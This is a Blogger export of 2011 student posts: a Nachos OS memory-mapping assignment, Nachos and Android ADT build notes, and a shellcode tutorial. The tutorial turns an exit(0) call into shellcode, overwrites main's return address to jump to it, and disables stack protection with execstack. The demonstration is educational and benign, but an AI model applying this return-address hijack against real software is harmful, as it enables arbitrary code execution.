<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> private:</span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> TranslationEntry *pageTable;</span></div><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><br />
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> unsigned int numPages;</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> <span class="Apple-style-span" style="color: red;">static unsigned int usedPhys;</span></div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> </div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> bool Load(char *fileName);</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"> void InitRegisters();</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">};</div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">2. initialize the static variable in the addrspace.cc</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#include "addrspace.h"</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> <span class="Apple-style-span" style="color: red;">unsigned int AddrSpace::usedPhys=0;</span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">3. modified the AddrSpace::Load()</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">executable->ReadAt(</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">&(kernel->machine->mainMemory[noffH.code.virtualAddr<b><span class="Apple-style-span" style="color: red;">+</span><span class="Apple-style-span" style="color: blue;">128</span><span class="Apple-style-span" style="color: red;">*usedPhys</span></b><span class="Apple-style-span" style="color: red;"><b>]</b></span>),noffH.code.size, noffH.code.inFileAddr);</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">P.S </span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">why usedPhys multiply 128 before adding to the virtualAddr?</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">The reason is simple, cuz the usedPhys is the page frame which is being used, not the physical memory.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">Therefore, when we are adding the usedPhys we also need to multiply the page size of the page frame, which is 128 byte per page.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">4.remapping the page table</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">for (unsigned int i = 0; i < <span class="Apple-style-span" style="color: red;">numPages</span>; i++) {</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>pageTable[i].virtualPage = i;<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>pageTable[i].physicalPage = i<span class="Apple-style-span" style="color: red;">+usedPhys</span>; </span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">P.S</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> the numPages is the number of the page frame the current process is using.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> there is no need to map the whole page again, just those the process is using.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">5. record the usedPhys</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> usedPhys += numPages;</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">P.S</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"> after those steps, adding the numPages to the usedPhys. Therefore, when the process 2 is loading it will not overwritten the address space of process 1.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><br />
</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;">6. the last steps is to compile the source code again and test the result.</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: inherit;"><b>Result:</b></span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="font-family: inherit;"><b><br />
</b></span></div><div style="font-family: 'Courier New', Courier, monospace; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-P5MkVIlBRUE/TgwW0tRHj0I/AAAAAAAAADo/HkDZ7xoCG2I/s1600/project2.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="131" src="http://3.bp.blogspot.com/-P5MkVIlBRUE/TgwW0tRHj0I/AAAAAAAAADo/HkDZ7xoCG2I/s320/project2.jpg" width="320" /></a></div><br />
</div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-30020615827436007442011-05-26T08:36:00.000-07:002011-08-19T02:45:14.575-07:00building nachosMy Operating system final project came out recently. The project is to build the nachos and modify some of the source code to let us understand more about operating system.<br />
<br />
However, the GCC version to compile the nachos OS is pretty low(gcc 2.95). This is not good since my environment is ubuntu 10.10 and the gcc version under ubuntu is 4.45.(way too high for building nachos). Fortunately, the source code of the nachos is not very long, so I modified some of the source code and Makefile to accomplished the building process.<br />
<br />
Here is how I done it:<br />
1. download the nachos source code.<br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"><span class="SpellE">wget</span></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">http://neuron.csie.ntust.edu.tw/homework/99/os/materials/nachos-4.0.tar.gz</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">2.download the mips cross compile tool</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"><span class="SpellE"> wget</span></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">http://neuron.csie.ntust.edu.tw/homework/99/os/materials/mips-decstation.linux-xgcc.gz</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"></span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">3.move the mips cross compile tool to the root directory</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> sudo mv </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">mips-decstation.linux-xgcc.gz /</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">4.unzip the file</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> sudo tar zxvf </span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">mips-decstation.linux-xgcc.gz /</span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">5.unzip the nachos </span><br />
<span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"> tar zxvf nachos-4.0.tar.gz</span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">It's time to build the source file.</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> cd ${nachos directory}/code</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> make</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">after doing this some problems pop up.</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">First</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> /bin/sh: gmake: not found</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;">solution:</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> use any text editor to change the Makefile. </span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> Change</span></span><br />
<span class="Apple-style-span" style="font-family: 'Franklin Gothic Book',serif;"><span class="Apple-style-span" style="border-collapse: collapse;"> <b> MAKE = </b></span></span><b><strike>gmake</strike> make</b><br />
Second<br />
the second problem is the ../lib/sysdep.h<br />
the iostream.h not found<br />
solution:<br />
simply change the<b> <iostream.h> to <iostream></b> and add a new line using namespace std;<br />
Third<br />
the reason of the third problem is the gcc version<br />
solution:<br />
use text editor the modified the Makefile.common,<br />
modified the line called "CFLAGS = -g -Wall <strike><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;">-</span><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"><span class="SpellE">fwritable</span></span></strike><span class="Apple-style-span" style="border-collapse: collapse; font-family: 'Franklin Gothic Book',serif; font-size: 16px;"><strike>-strings</strike> ........</span>"<br />
Fourth<br />
the terminal will echo many errors.<br />
solution:<br />
the solution is very simple, add <b><i>this-></i></b> to the error variables or functions.<br />
<br />
this is it, the nachos is finished, enjoyed.<br />
<br />
Here is the video tutorial by Isaias<br />
<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='480' height='390' src='https://www.youtube.com/embed/plGyUq4PcVA?feature=player_embedded' frameborder='0'></iframe></div> <br />
The original link:<a href="http://os-fime.blogspot.com/2011/08/how-to-compile-nachos.html">http://os-fime.blogspot.com/2011/08/how-to-compile-nachos.html </a><br />
<br />
reference website:<a href="http://neuron.csie.ntust.edu.tw/homework/99/OS/homework/homework1/B9715017-hw1-1/#ubuntu10">http://neuron.csie.ntust.edu.tw/homework/99/OS/homework/homework1/B9715017-hw1-1/#ubuntu10</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com3tag:blogger.com,1999:blog-1191178933370250826.post-52116433061330100812011-05-02T03:49:00.000-07:002011-07-08T11:08:38.157-07:00Shell codeAfter studying computer science for about two years, I have change my thought about executable files. <br />
A executable format may contains many section, such as .text(where your code is stored), .data(where your global variables and static variables is stored)...<br />
Have you ever wonder if we stored the executable bytes in the .data section? This is what a shell code is. <br />
<br />
here is an example to demonstrate how it works.<br />
My environment is ubuntu 10.10 and gcc version is 4.4.5. <br />
First writing a simple program which just do nothing at all.<br />
<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">example1.c</span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">#include <stdlib.h></span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">int main()</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">{</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"> exit(0);</span></div><div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"> return 0;</span></div><span style="font-family: 'Courier New', Courier, monospace;"><span style="color: black;">}</span></span><br />
<br />
<br />
makefile:<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">gcc -g -static -o example1.out example1.c </span> //compile the source file with static link<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">objdump -D example1.out >> example1.dump</span> //dump the executable file<br />
<br />
now lets see what happened by looking at the example1.dump.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">080482c0 <main></span><br />
<span style="font-family: 'Courier New', Courier, monospace;">80482c0: 55 push %ebp</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">80482c1: 89 e5 mov %esp,%ebp<br />
80482c3: 83 e4 f0 and $0xfffffff0,%esp<br />
80482c6: 83 ec 10 sub $0x10,%esp<br />
80482c9: c7 04 24 00 00 00 00 movl $0x0,(%esp)<br />
80482d0: e8 db 08 00 00 call 8048bb0 <exit></span><br />
<br />
<br />
<i>the first two instructions is to set the stack frame of main.</i><br />
<i>the third instruction is to align the stack segment.</i><br />
<i>the last two instruction is to push the parameter into the stack and call function exit. </i><br />
What we are interested in is the last two instruction.<br />
<br />
<br />
lets write a second example.<br />
<span style="font-family: 'Courier New', Courier, monospace;"><i><br />
</i></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>example2.c</i></span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;"><i>#include <stdlib.h><br />
int main()<br />
{<br />
asm("movl $0x0,(%esp);\<br />
call 0x8048bb0;\<br />
");<br />
}</i></span></div><br />
<br />
lets see the dump file.<br />
<span style="font-family: 'Courier New', Courier, monospace;">080482c0 <main>:</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">80482c0: 55 push %ebp<br />
80482c1: 89 e5 mov %esp,%ebp<br />
80482c3: c7 04 24 00 00 00 00 movl $0x0,(%esp)<br />
80482ca: <b><span style="color: red;">e8 e1 08 00 00 call 8048bb0 <exit></span></b></span><br />
<br />
<br />
and now lets turn it into shell code.<br />
but before we do that there are something we should know first.<br />
when gcc transfer the assembly into machine code, it will use a related call which will called the function by the offset.<br />
Therefore, when we turn this into shell code, the address will be different depending on where your shell code is located.<br />
Therefore, we need to use an absolute call instead of a related call.<br />
lets first write them into assembly language.<br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">example3.c</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">#include <stdlib.h><br />
int main()<br />
{<br />
asm("movl $0x0,(%esp);\<br />
movl $0x8048bb0,%eax;\<br />
call *%eax;\<br />
");<br />
}</span></div>and the dump file:<br />
<span style="font-family: 'Courier New', Courier, monospace;">080482c0 <main>:<br />
80482c0: 55 push %ebp<br />
80482c1: 89 e5 mov %esp,%ebp<br />
80482c3: c7 04 24 00 00 00 00 movl $0x0,(%esp)<br />
80482ca: b8 b0 8b 04 08 mov $0x8048bb0,%eax<br />
80482cf: <b><span style="color: red;">ff d0 call *%eax</span></b><br />
80482d1: 5d pop %ebp<br />
80482d2: c3 ret</span><br />
<br />
In example3 the highlight is the main difference. The instruction byte become 0xff instead of 0xe8<br />
and now let's transfer 0x80482c3~ 0x80482cf into shell code.<br />
<br />
<span style="font-family: 'Courier New', Courier, monospace;">example4.c</span><br />
<div style="color: black;"><span style="font-family: 'Courier New', Courier, monospace;">#include <stdlib.h><br />
char shellcode[] = "\xc7\x04\x24\x00\x00\x00\x00\xb8\xb0\x8b\x04\x08\xff\xd0";<br />
int main()<br />
{<br />
int *ptr;<br />
int i;<br />
for(i=0;i<10;i++)<br />
{<br />
ptr = (int*)&ptr+i;<br />
(*ptr) = (int)shellcode;<br />
}<br />
return 0; <br />
}</span></div><br />
you may wonder what is the purpose of the for loop and the int pointer.<br />
When we finished writing the shellcode, the executable bytes is in the data section.<br />
Therefore we need to find a way to transfer the executable path to the shellcode.<br />
And the method I used is to override the Return address of the main function, so when the main function is return, it will return to the shellcode instead of the caller function.<br />
<br />
now execute it, and you will meet a segmentation fault.<br />
it's time to use gdb to debug this program.<br />
<i><span style="font-family: 'Courier New', Courier, monospace;"><br />
</span></i><br />
<i><span style="font-family: 'Courier New', Courier, monospace;">(gdb) disassem main<br />
Dump of assembler code for function main:<br />
0x080482c0 <+0>: push %ebp<br />
0x080482c1 <+1>: mov %esp,%ebp<br />
0x080482c3 <+3>: sub $0x10,%esp<br />
0x080482c6 <+6>: movl $0x0,-0x8(%ebp)<br />
0x080482cd <+13>: jmp 0x80482eb <main+43><br />
0x080482cf <+15>: lea -0x4(%ebp),%eax<br />
0x080482d2 <+18>: mov -0x8(%ebp),%edx<br />
0x080482d5 <+21>: shl $0x2,%edx<br />
0x080482d8 <+24>: add %edx,%eax<br />
0x080482da <+26>: mov %eax,-0x4(%ebp)<br />
0x080482dd <+29>: mov -0x4(%ebp),%eax<br />
0x080482e0 <+32>: mov $0x80ce028,%edx<br />
0x080482e5 <+37>: mov %edx,(%eax)<br />
0x080482e7 <+39>: addl $0x1,-0x8(%ebp)<br />
0x080482eb <+43>: cmpl $0x9,-0x8(%ebp)<br />
0x080482ef <+47>: jle 0x80482cf <main+15><br />
0x080482f1 <+49>: mov $0x0,%eax<br />
0x080482f6 <+54>: leave <br />
0x080482f7 <+55>: ret <br />
End of assembler dump.</span></i><br />
<span style="font-family: 'Courier New', Courier, monospace;">(<i>gdb) b *(main+55)<br />
Breakpoint 1 at 0x80482f7: file example4.c, line 13.</i></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>(gdb) r<br />
Starting program: example4.out Breakpoint 1, 0x080482f7 in main () at example4.c:13<br />
13 }</i></span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>(gdb) x/a $esp<br />
0xbffff2ec: 0x80ce028 <shellcode><br />
(gdb) x/3i 0x80ce028<br />
0x80ce028 <shellcode>: movl $0x0,(%esp)<br />
0x80ce02f <shellcode+7>: mov $0x8048bb0,%eax<br />
0x80ce034 <shellcode+12>: call *%eax</i><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><i>(gdb) disassem exit<br />
Dump of assembler code for function exit:<br />
0x08048bd0 <+0>: push %ebp<br />
0x08048bd1 <+1>: mov %esp,%ebp<br />
0x08048bd3 <+3>: sub $0x18,%esp<br />
0x08048bd6 <+6>: mov 0x8(%ebp),%eax<br />
0x08048bd9 <+9>: movl $0x1,0x8(%esp)<br />
0x08048be1 <+17>: movl $0x80ce03c,0x4(%esp)<br />
0x08048be9 <+25>: mov %eax,(%esp)<br />
0x08048bec <+28>: call 0x8048ad0 <__run_exit_handlers><br />
End of assembler dump.</i></span><br />
<br />
<br />
oh no, the address of exit() is changed.<br />
this may be our problem, let's modify the shellcode<br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">example5.c</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><br />
<span style="font-family: 'Courier New', Courier, monospace;"><b style="color: black;">#include <stdlib.h><br />
char shellcode[] = "\xc7\x04\x24\x00\x00\x00\x00<span style="color: red;">\xb8\xd0\x8b\x04\x08</span>\xff\xd0";<br />
int main()<br />
{<br />
int *ptr;<br />
int i;<br />
for(i=0;i<10;i++)<br />
{<br />
ptr = (int*)&ptr+i;<br />
(*ptr) = (int)shellcode;<br />
}<br />
return 0; <br />
}</b></span><br />
<br />
compile it and execute it. and still meet segmentation fault.<br />
let's use gdb again.<br />
<span style="font-family: 'Courier New', Courier, monospace;">(gdb) b *(main+55)<br />
Breakpoint 1 at 0x80482f7: file example5.c, line 13.<br />
(gdb) r<br />
Starting program: example5.out</span><br />
<span style="font-family: 'Courier New', Courier, monospace;">Breakpoint 1, 0x080482f7 in main () at example5.c:13<br />
13 }<br />
<i>(gdb) x/a $esp<br />
0xbffff2ec: 0x80ce028 <shellcode><br />
(gdb) x/3i 0x80ce028<br />
0x80ce028 <shellcode>: movl $0x0,(%esp)<br />
0x80ce02f <shellcode+7>: mov $0x8048bd0,%eax<br />
0x80ce034 <shellcode+12>: call *%eax<br />
(gdb) x/i exit<br />
0x8048bd0 <exit>: push %ebp</i></span><br />
<br />
everything looks ok, so where is the problem.<br />
the reason causing this problem is the nonexecutable stack.<br />
type sudo apt-get install execstack in your command shell.<br />
<span style="font-family: 'Courier New', Courier, monospace;"> execstack -s example5.out</span><br />
after that the program is finally finished as expected.<br />
<br />
next article: <a href="http://mike820324.blogspot.com/2011/06/shellcode-cont.html">shell code 2 (cont.)</a><br />
reference website:<br />
<a href="https://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/">https://paulmakowski.wordpress.com/2011/01/25/smashing-the-stack-in-2011/</a><br />
<a href="http://stackoverflow.com/questions/5850524/buffer-overflow-problem">http://stackoverflow.com/questions/5850524/buffer-overflow-problem </a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com5tag:blogger.com,1999:blog-1191178933370250826.post-82961122475485883642011-04-20T10:32:00.000-07:002011-06-29T08:22:48.714-07:00building the android adt for eclipseAfter building the android source code and the sdk. I tried to build the adt as well.<br />
But remember when you make adt, android will delete the .sdk and the .img which generated from android source code. (I took a lot of time to make the image files T T )<br />
Therefore, my advice is backup those file before building the android adt.<br />
<br />
OS: ubuntu 10.10<br />
java version: sun-jdk1.5<br />
<br />
Ok, now this is how I built my android adt.<br />
1. Download eclipse from <a href="http://www.eclipse.org/downloads/">here</a>. (I prefer Download manually. When I use apt-get install eclipse, the building process failed.)<br />
P.S I prefer the RAP and RCP version (since the package is smaller).<br />
<br />
2. After downloading, extract the file to any directory you want.<br />
for example: ~/eclipse<br />
<br />
3. set the environment variable ECLIPSE_HOME.<br />
export ECLIPSE_HOME=${the directory you extract your eclipse}<br />
<br />
4.the final step is to make the adt using the script contain in the source code.<br />
${android home}/tools/eclipse/scripts/build_server.sh ${destination-directory}<br />
<span class="Apple-style-span" style="color: #000066; font-family: arial, Sans-erif; font-size: 13px; font-weight: bold; line-height: 17px;"> </span><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><span class="Apple-style-span" style="color: #000066; font-size: 13px; line-height: 17px;"> </span></span><br />
<span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><span class="Apple-style-span" style="font-size: 13px; line-height: 17px;">P.S the build_server.sh script may be contains in different folder depend on which version of source code you download</span></span><br />
<span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"> ${android home} is where your android source code is</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"> ${destination-directory} is where you want to put your adt zip file.</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">After all these steps, you can see a zip file in your destination folder.</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;"><br />
</span></span><br />
<span class="Apple-style-span" style="font-size: 13px; line-height: 17px;"><span class="Apple-style-span" style="font-family: Georgia, 'Times New Roman', serif;">reference website: <a href="http://funkie921.blogspot.com/2009/04/build-android-development-toolkit-kit.html">Build android device tool for eclipse</a></span></span><br />
<span class="Apple-style-span" style="color: #000066; font-family: arial, Sans-erif; font-size: x-small;"><span class="Apple-style-span" style="line-height: 17px;"><b><br />
</b></span></span>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0